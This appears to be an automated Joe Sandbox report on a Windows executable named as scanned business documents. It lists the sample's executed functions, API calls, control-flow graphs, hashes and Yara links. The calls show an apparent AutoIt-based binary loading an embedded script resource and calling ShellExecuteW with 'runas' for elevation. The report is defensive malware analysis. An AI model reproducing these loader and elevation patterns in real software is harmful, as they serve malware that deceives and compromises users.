284af0 __wsopen_s 97436->97437 97438 286b57 22 API calls 97437->97438 97439 284b22 97437->97439 97438->97439 97440 284c6d 22 API calls 97439->97440 97449 284b58 97439->97449 97440->97439 97441 289cb3 22 API calls 97443 284c52 97441->97443 97442 289cb3 22 API calls 97442->97449 97444 28515f 22 API calls 97443->97444 97447 284c5e 97444->97447 97445 284c6d 22 API calls 97445->97449 97446 28515f 22 API calls 97446->97449 97447->97361 97448 284c29 97448->97441 97448->97447 97449->97442 97449->97445 97449->97446 97449->97448 97450->97377 97451->97384 97452->97392 97453->97402 97454->97405 97455->97410 97456->97415 97457->97418 97458->97422 97459->97419 97460->97425 97461->97429 97462->97433 97463->97433 97464->97433 97465->97433 97466->97385 97467->97389 97468->97396 97469->97403 97470->97413

                                                      Executed Functions

                                                      Function 002842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 234 2842de-28434d call 28a961 GetVersionExW call 286b57 239 2c3617-2c362a 234->239 240 284353 234->240 242 2c362b-2c362f 239->242 241 284355-284357 240->241 243 28435d-2843bc call 2893b2 call 2837a0 241->243 244 2c3656 241->244 245 2c3631 242->245 246 2c3632-2c363e 242->246 263 2c37df-2c37e6 243->263 264 2843c2-2843c4 243->264 250 2c365d-2c3660 244->250 245->246 246->242 247 2c3640-2c3642 246->247 247->241 249 2c3648-2c364f 247->249 249->239 252 2c3651 249->252 253 28441b-284435 GetCurrentProcess IsWow64Process 250->253 254 2c3666-2c36a8 250->254 252->244 256 284494-28449a 253->256 257 284437 253->257 254->253 258 2c36ae-2c36b1 254->258 260 28443d-284449 256->260 257->260 261 2c36db-2c36e5 258->261 262 2c36b3-2c36bd 258->262 265 28444f-28445e LoadLibraryA 260->265 266 2c3824-2c3828 GetSystemInfo 260->266 270 2c36f8-2c3702 261->270 271 2c36e7-2c36f3 261->271 267 2c36bf-2c36c5 262->267 268 2c36ca-2c36d6 262->268 272 2c37e8 263->272 273 2c3806-2c3809 263->273 264->250 269 2843ca-2843dd 264->269 276 28449c-2844a6 GetSystemInfo 265->276 277 284460-28446e GetProcAddress 265->277 267->253 268->253 278 2c3726-2c372f 269->278 279 2843e3-2843e5 269->279 281 2c3704-2c3710 270->281 282 2c3715-2c3721 270->282 271->253 280 2c37ee 272->280 274 2c380b-2c381a 273->274 275 2c37f4-2c37fc 273->275 274->280 285 2c381c-2c3822 274->285 275->273 287 284476-284478 276->287 277->276 286 284470-284474 GetNativeSystemInfo 277->286 283 2c373c-2c3748 278->283 284 2c3731-2c3737 278->284 288 2c374d-2c3762 279->288 289 2843eb-2843ee 279->289 280->275 281->253 282->253 283->253 284->253 285->275 286->287 292 28447a-28447b FreeLibrary 287->292 293 284481-284493 287->293 290 2c376f-2c377b 288->290 291 2c3764-2c376a 288->291 294 2843f4-28440f 289->294 295 2c3791-2c3794 289->295 290->253 291->253 292->293 296 2c3780-2c378c 294->296 297 284415 294->297 295->253 298 2c379a-2c37c1 295->298 296->253 297->253 299 2c37ce-2c37da 298->299 300 2c37c3-2c37c9 298->300 299->253 300->253
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 0028430D
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • GetCurrentProcess.KERNEL32(?,0031CB64,00000000,?,?), ref: 00284422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00284429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00284454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00284466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00284474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0028447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 002844A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: fa01fc76d976b738c48f3d26426013a0e99072afa3922b1a36f6bd5b874d3f13
                                                      • Instruction ID: a0c65188b9ac73d385e63d5d583b861dbf3fc3107cfa8a194bc769554bce21dc
                                                      • Opcode Fuzzy Hash: fa01fc76d976b738c48f3d26426013a0e99072afa3922b1a36f6bd5b874d3f13
                                                      • Instruction Fuzzy Hash: 71A1D36DA3A3C1DFC713EB687C607957FAC6F36346F1899ACD44193A71D2604918CB21
                                                      Function 002842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1378 2842a2-2842ba CreateStreamOnHGlobal 1379 2842da-2842dd 1378->1379 1380 2842bc-2842d3 FindResourceExW 1378->1380 1381 2842d9 1380->1381 1382 2c35ba-2c35c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 2c35cf-2c35dd SizeofResource 1382->1383 1383->1381 1384 2c35e3-2c35ee LockResource 1383->1384 1384->1381 1385 2c35f4-2c3612 1384->1385 1385->1381
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002850AA,?,?,00000000,00000000), ref: 002842B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002850AA,?,?,00000000,00000000), ref: 002842C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20), ref: 002C35BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20), ref: 002C35D3
                                                      • LockResource.KERNEL32(002850AA,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20,?), ref: 002C35E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
                                                      • Instruction ID: 09e6cb130b3bf99ae4af044e2d88694d4c2d1bd7a65952c896be13cc3aa27a88
                                                      • Opcode Fuzzy Hash: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
                                                      • Instruction Fuzzy Hash: 2111A074251306BFDB22AF65DC48FA77BBDEBC9B55F108569F802C6190DB71E810C620
                                                      Function 002C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00282B6B
                                                        • Part of subcall function 00283A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00351418,?,00282E7F,?,?,?,00000000), ref: 00283A78
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00342224), ref: 002C2C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00342224), ref: 002C2C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: fad9135566f6b8d06f6bb824477ce36d6000a81a06809650597d94dc5a28979f
                                                      • Instruction ID: 7b584310d95951995c2650026822ccf52f5c5a5bb55401f4bf426be403000ce0
                                                      • Opcode Fuzzy Hash: fad9135566f6b8d06f6bb824477ce36d6000a81a06809650597d94dc5a28979f
                                                      • Instruction Fuzzy Hash: 2911063912A301AAC706FF60D851FBEB7A89B95705F44142DF082160E3CF218A6E8B52
                                                      Function 002EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,002C5222), ref: 002EDBCE
                                                      • GetFileAttributesW.KERNELBASE(?), ref: 002EDBDD
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 002EDBEE
                                                      • FindClose.KERNEL32(00000000), ref: 002EDBFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2695905019-0
                                                      • Opcode ID: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
                                                      • Instruction ID: 1abc0b539b01e83671e0f5eb95c0491d59e86c0c505b6cf02bdb8351803a8b23
                                                      • Opcode Fuzzy Hash: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
                                                      • Instruction Fuzzy Hash: C2F0A0308B091067C2216F78AC0D8AA376C9E05374FA0AB03F836C20E0EBB059658696
                                                      Function 0028BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: p#5
                                                      • API String ID: 3964851224-1135215104
                                                      • Opcode ID: 5cb0958253a28219a4712adf22c97562182fd70ebc9e6e01a22c2aacf4bfb991
                                                      • Instruction ID: 2ddcfed66205ba60fdb759cf35a3268a8840909a51df16e2b04adf631ab027fe
                                                      • Opcode Fuzzy Hash: 5cb0958253a28219a4712adf22c97562182fd70ebc9e6e01a22c2aacf4bfb991
                                                      • Instruction Fuzzy Hash: 99A27E745293018FD714DF14C480B2AB7E1BF89304F24896EE9999B3A2D771EC65CFA2
                                                      Function 0028D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetInputState.USER32 ref: 0028D807
                                                      • timeGetTime.WINMM ref: 0028DA07
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB28
                                                      • TranslateMessage.USER32(?), ref: 0028DB7B
                                                      • DispatchMessageW.USER32(?), ref: 0028DB89
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028DB9F
                                                      • Sleep.KERNEL32(0000000A), ref: 0028DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                      • String ID:
                                                      • API String ID: 2189390790-0
                                                      • Opcode ID: b1f6cb30140b23509630b3b5cb76b377b0b785ae3670de7dab54e4dfae01cbdd
                                                      • Instruction ID: 29c62f7752958eb3bb93b08b75a3d0900f1c28b47d5e44b33f4d78aa3ca04fed
                                                      • Opcode Fuzzy Hash: b1f6cb30140b23509630b3b5cb76b377b0b785ae3670de7dab54e4dfae01cbdd
                                                      • Instruction Fuzzy Hash: 9E420134629342EFD729EF24C844BAAB7A4BF55314F14851AE495873E1D7B0EC68CF82
                                                      Function 00282CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00282D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00282D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00282D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00282D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00282D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00282D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00282D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
                                                      • Instruction ID: f56fcb2d6e78d9cbef4f1b2a938c0cb7d310ce45739db63029399728977e5757
                                                      • Opcode Fuzzy Hash: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
                                                      • Instruction Fuzzy Hash: 4D21C0B5961318AFDB02DFA4EC89BDDBBB8FB0C701F00911AF511A62A0D7B14544CF91
                                                      Function 002B8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 302 2b8d45-2b8d55 303 2b8d6f-2b8d71 302->303 304 2b8d57-2b8d6a call 2af2c6 call 2af2d9 302->304 306 2b90d9-2b90e6 call 2af2c6 call 2af2d9 303->306 307 2b8d77-2b8d7d 303->307 320 2b90f1 304->320 326 2b90ec call 2b27ec 306->326 307->306 310 2b8d83-2b8dae 307->310 310->306 313 2b8db4-2b8dbd 310->313 316 2b8dbf-2b8dd2 call 2af2c6 call 2af2d9 313->316 317 2b8dd7-2b8dd9 313->317 316->326 318 2b8ddf-2b8de3 317->318 319 2b90d5-2b90d7 317->319 318->319 324 2b8de9-2b8ded 318->324 325 2b90f4-2b90f9 319->325 320->325 324->316 328 2b8def-2b8e06 324->328 326->320 331 2b8e08-2b8e0b 328->331 332 2b8e23-2b8e2c 328->332 333 2b8e0d-2b8e13 331->333 334 2b8e15-2b8e1e 331->334 335 2b8e4a-2b8e54 332->335 336 2b8e2e-2b8e45 call 2af2c6 call 2af2d9 call 2b27ec 332->336 333->334 333->336 339 2b8ebf-2b8ed9 334->339 337 2b8e5b-2b8e79 call 2b3820 call 2b29c8 * 2 335->337 338 2b8e56-2b8e58 335->338 364 2b900c 336->364 373 2b8e7b-2b8e91 call 2af2d9 call 2af2c6 337->373 374 2b8e96-2b8ebc call 2b9424 337->374 338->337 341 2b8edf-2b8eef 339->341 342 2b8fad-2b8fb6 call 2bf89b 339->342 341->342 345 2b8ef5-2b8ef7 341->345 353 2b9029 342->353 354 2b8fb8-2b8fca 342->354 345->342 349 2b8efd-2b8f23 345->349 349->342 356 2b8f29-2b8f3c 349->356 362 2b902d-2b9045 ReadFile 353->362 354->353 358 2b8fcc-2b8fdb GetConsoleMode 354->358 356->342 360 2b8f3e-2b8f40 356->360 358->353 363 2b8fdd-2b8fe1 358->363 360->342 365 2b8f42-2b8f6d 360->365 367 2b90a1-2b90ac GetLastError 362->367 368 2b9047-2b904d 362->368 363->362 370 2b8fe3-2b8ffd ReadConsoleW 363->370 371 2b900f-2b9019 call 2b29c8 364->371 365->342 372 2b8f6f-2b8f82 365->372 375 2b90ae-2b90c0 call 2af2d9 call 2af2c6 367->375 376 2b90c5-2b90c8 367->376 368->367 369 2b904f 368->369 378 2b9052-2b9064 369->378 380 2b8fff GetLastError 370->380 381 2b901e-2b9027 370->381 371->325 372->342 385 2b8f84-2b8f86 372->385 373->364 374->339 375->364 382 2b90ce-2b90d0 376->382 383 2b9005-2b900b call 2af2a3 376->383 378->371 388 2b9066-2b906a 378->388 380->383 381->378 382->371 383->364 385->342 392 2b8f88-2b8fa8 385->392 395 2b906c-2b907c call 2b8a61 388->395 396 2b9083-2b908e 388->396 392->342 407 2b907f-2b9081 395->407 401 2b909a-2b909f call 2b88a1 396->401 402 2b9090 call 2b8bb1 396->402 408 2b9095-2b9098 401->408 402->408 407->371 408->407
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .*
                                                      • API String ID: 0-1914541848
                                                      • Opcode ID: 69547e90c56ca0f7c3dbb6dee2b7f09708283c8767c79899bf0a02cbe85df732
                                                      • Instruction ID: d8c747ed95cddca5fdd6e3ba3899b728ad5e76cbe53c63461967b80ec498ac25
                                                      • Opcode Fuzzy Hash: 69547e90c56ca0f7c3dbb6dee2b7f09708283c8767c79899bf0a02cbe85df732
                                                      • Instruction Fuzzy Hash: 54C11574D2434AAFCB11EFA8D840BEDBBB8AF09350F144459F918A7392CB758991CF60
                                                      Function 002C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 410 2c065b-2c068b call 2c042f 413 2c068d-2c0698 call 2af2c6 410->413 414 2c06a6-2c06b2 call 2b5221 410->414 419 2c069a-2c06a1 call 2af2d9 413->419 420 2c06cb-2c0714 call 2c039a 414->420 421 2c06b4-2c06c9 call 2af2c6 call 2af2d9 414->421 428 2c097d-2c0983 419->428 430 2c0716-2c071f 420->430 431 2c0781-2c078a GetFileType 420->431 421->419 435 2c0756-2c077c GetLastError call 2af2a3 430->435 436 2c0721-2c0725 430->436 432 2c078c-2c07bd GetLastError call 2af2a3 CloseHandle 431->432 433 2c07d3-2c07d6 431->433 432->419 449 2c07c3-2c07ce call 2af2d9 432->449 440 2c07df-2c07e5 433->440 441 2c07d8-2c07dd 433->441 435->419 436->435 437 2c0727-2c0754 call 2c039a 436->437 437->431 437->435 442 2c07e9-2c0837 call 2b516a 440->442 443 2c07e7 440->443 441->442 452 2c0839-2c0845 call 2c05ab 442->452 453 2c0847-2c086b call 2c014d 442->453 443->442 449->419 452->453 459 2c086f-2c0879 call 2b86ae 452->459 460 2c086d 453->460 461 2c087e-2c08c1 453->461 459->428 460->459 463 2c08e2-2c08f0 461->463 464 2c08c3-2c08c7 461->464 466 2c097b 463->466 467 2c08f6-2c08fa 463->467 464->463 465 2c08c9-2c08dd 464->465 465->463 466->428 467->466 469 2c08fc-2c092f CloseHandle call 2c039a 467->469 472 2c0931-2c095d GetLastError call 2af2a3 call 2b5333 469->472 473 2c0963-2c0977 469->473 472->473 473->466
                                                      APIs
                                                        • Part of subcall function 002C039A: CreateFileW.KERNELBASE(00000000,00000000,?,002C0704,?,?,00000000,?,002C0704,00000000,0000000C), ref: 002C03B7
                                                      • GetLastError.KERNEL32 ref: 002C076F
                                                      • __dosmaperr.LIBCMT ref: 002C0776
                                                      • GetFileType.KERNELBASE(00000000), ref: 002C0782
                                                      • GetLastError.KERNEL32 ref: 002C078C
                                                      • __dosmaperr.LIBCMT ref: 002C0795
                                                      • CloseHandle.KERNEL32(00000000), ref: 002C07B5
                                                      • CloseHandle.KERNEL32(?), ref: 002C08FF
                                                      • GetLastError.KERNEL32 ref: 002C0931
                                                      • __dosmaperr.LIBCMT ref: 002C0938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 2cb9eef673f2fa49bc5e53794671dd3dac8fe9f79ab6390c4ffee591641cf0a2
                                                      • Instruction ID: 06da3ec05ce8096fb521934057c12c7720be3695c9abff153beab0bc51bd465e
                                                      • Opcode Fuzzy Hash: 2cb9eef673f2fa49bc5e53794671dd3dac8fe9f79ab6390c4ffee591641cf0a2
                                                      • Instruction Fuzzy Hash: 46A14832A20205CFDF19AF68D891BAD7BA4AB06320F14425DF8159F2A1DB359D22CF91
                                                      Function 0028344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00283A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00351418,?,00282E7F,?,?,?,00000000), ref: 00283A78
                                                        • Part of subcall function 00283357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00283379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0028356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002C318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002C31CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 002C3210
                                                      • _wcslen.LIBCMT ref: 002C3277
                                                      • _wcslen.LIBCMT ref: 002C3286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 93e7fcaadf63307315b32b86bf707c422594de6da032ebefa9d5ad44b1db1773
                                                      • Instruction ID: adff837d64a3cc93f82112fc05f2a087db316881ffbf7cb28a8f47b25a01988d
                                                      • Opcode Fuzzy Hash: 93e7fcaadf63307315b32b86bf707c422594de6da032ebefa9d5ad44b1db1773
                                                      • Instruction Fuzzy Hash: 0F719B795293019EC716EF65DC819ABBBECBF8A740F40492EF445931B0EB309A58CF52
                                                      Function 00282B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00282B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00282B9D
                                                      • LoadIconW.USER32(00000063), ref: 00282BB3
                                                      • LoadIconW.USER32(000000A4), ref: 00282BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00282BD7
